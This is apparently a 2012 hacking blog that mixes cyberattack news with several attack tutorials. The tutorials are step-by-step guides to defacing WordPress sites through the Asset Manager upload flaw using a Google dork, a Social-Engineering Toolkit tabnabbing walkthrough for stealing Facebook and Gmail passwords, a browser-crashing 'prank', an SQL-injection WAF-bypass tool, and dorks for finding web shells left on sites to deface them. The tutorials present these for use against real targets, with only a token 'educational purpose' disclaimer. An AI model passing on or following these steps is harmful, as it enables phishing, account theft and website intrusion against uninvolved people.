Chinese hackers apparently gained access to information about vulnerabilities in Microsoft’s operating systems before a company patch was released, and security researchers are worried the leak came directly from Microsoft’s secured website.

The Microsoft Security Response Center states the Microsoft Active Protections Program is a program for security software providers that “gives members

Wednesday, 21 March 2012

WordPress Remote File Upload Vulnerability with Asset Manager Hack Web sites

In WordPress we can upload our deface page using Remote File Upload Vulnerability with Asset Manager. Asset Manager is a plugin that allows you to upload your files Just simply follow the simple steps to hack the wordpress website.
1. Open google and search inurl:Editor/assetmanager/assetmanager.asp
2. Now open any result you will found look like bellow snapshot.
3. Just click on browse and upload your deface page.

wordpress hacking

Demo: Asset Manager Deface page

Sunday, 18 March 2012

Hacking GSM Mobile Network in India








A GSM mobile phone user in India is not very safe from hacking attacks, a security company has demonstrated.

Four founding members of a company called Matrix Shell say they have worked out a way to hack into India GSM phone numbers and make calls from them. They were able to use the unique SIM card number called International Mobile Subscriber Identity (IMSI) of their target victims.

Hack facebook account and Gmail account using Backtrack 5

In my previous tutorial I have explained “ How to hack facebook account using phishing ” , Now in this tutorial I am going to show you how to hack facebook account using backtrack 5. So just follow the simple steps.
Open your backtrack 5’s terminal and type cd /pentest/exploits/set
Backtrack5 1

Now Open social Engineering Tool kit (SET) ./set
backtrack5 2

Just hit ENTER and SET will Open , Now just select 1st option (1 Social-Engineering Attacks) and hit enter after that 2nd number (just type 2 as shown in snapshot)
backtrack5 3

Now Just select 4th Option “Tabnabbing Attack Method” and Hit ENTER
backtrack5 4

Then select 2nd option “Site Cloner” and Hit ENTER
backtrack5 5

Now here you need to add the URL of Facebook (if you want to hack gmail then just add the gmail’s URL)
backtrtack5 6

Now just hit the enter.
backtrack5 6

Open new terminal and just type ifconfig and hit ENTER
backtrack5 9

Now just copy this IP address and open it in Browser.
backtrack5 7

Now here I am just typing test email and password to see whether it works or not.
backtrack5 8

Now just hit enter and switch back to our terminal and we found the Email and password !
backtrack5 10

This tutorial is just educational purpose only.

Saturday, 17 March 2012

5 Simple Hacks to Prank your friends


1. Crash a Computer System With Nothing But a URL!I stumbled across this URL while surfing the internet. This is a javascript "exploit" (that still works, by the way) and will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM.WARNING: CLICKING ON

Friday, 16 March 2012

How to hack cell phones/ mobiles ?


# 1 -- Physical Access to the Phone -- Obviously, if a person can get physical access to a cell phone, even for a few seconds, it's game over. The person can clone it, place a remote spying tool on the phone or download the pictures and information directly to their own account.

#2 -- Hacking Email, Twitter and Apps -- Most celebrities are hacked through email, Twitter and other accounts that

Thursday, 15 March 2012

BBC hack attack linked to the Iranians






The BBC’s director general stops short of accusing Tehran, but speaks of strong links between the denial of service attack and the country.






The BBC has fallen victim to another cyber attack, with all eyes looking to Iran as the possible perpetrator.

The global media company believes adistributed denial of service (DDoS) attack was the reason for its outlets across Persia falling down

Wednesday, 14 March 2012

Electronic voting system hacked









(AFP Photo / Joe Raedle)



When Washington, DC decided to try out an Internet voting system to make casting absentee ballots as easy as clicking a mouse, they dared hackers to compromise the contest. It was a feat accomplished in less than two days.The District of Columbia hosted a public trial before going live with an e-voting program to see if their presumably impenetrable online

Chinese Hack BAE to learn about F-35



This plane will have taken more than $385 billion to develop and will take $1 trillion to sustain. It is the most expensive weapons system in history. And yet for 18 months, the Chinese were just living on (at least) BAE’s networks taking what they wanted. How much of the considerable cost and rework on this program comes from the data on it China has stolen along the way? 
More Info on:
http:/

Maxsqli syntax maker tool

maxsqli syntax builder

This tool helps hackers/pentesters to create sql syntax. Its also help in waf bypass sql injection method. you can see the tool in the above snapshot.
Download it from here

Tuesday, 13 March 2012

Control an Arduino from your Android device using a cheap bluetooth module


Check out this new instructable which shows you how to read sensor values from an Arduino with your Android device using a cheap bluetooth serial device you can order for under $10 on dealextreme or ebay.



This example uses Python as the scripting language for the Android scripting layer (SL4A) but you can choose from other languages like Perl, Lua, JavaScript etc. see: http://code.google.com/

Find Shells Using "Index of /sh3llZ" Google Dork

shells

After getting the admin access hackers are Uploading their control penal (that’s call shell). Shell allows hackers to hack/deface the website and using the shell hacker can get root access. Sometime hackers left the shell in vulnerable sits. And here is some Google dorks which helps you to find the shells.

intitle:index of/sh3llZ

"Index of /sh3llZ"

"/sh3llZ/uploadshell/uploadshell.php

You can see in the above figure there are some shells like c99.php , c100.php etc. using that shell u can upload your shell and you can also deface that site.

Credits:
Devils cafe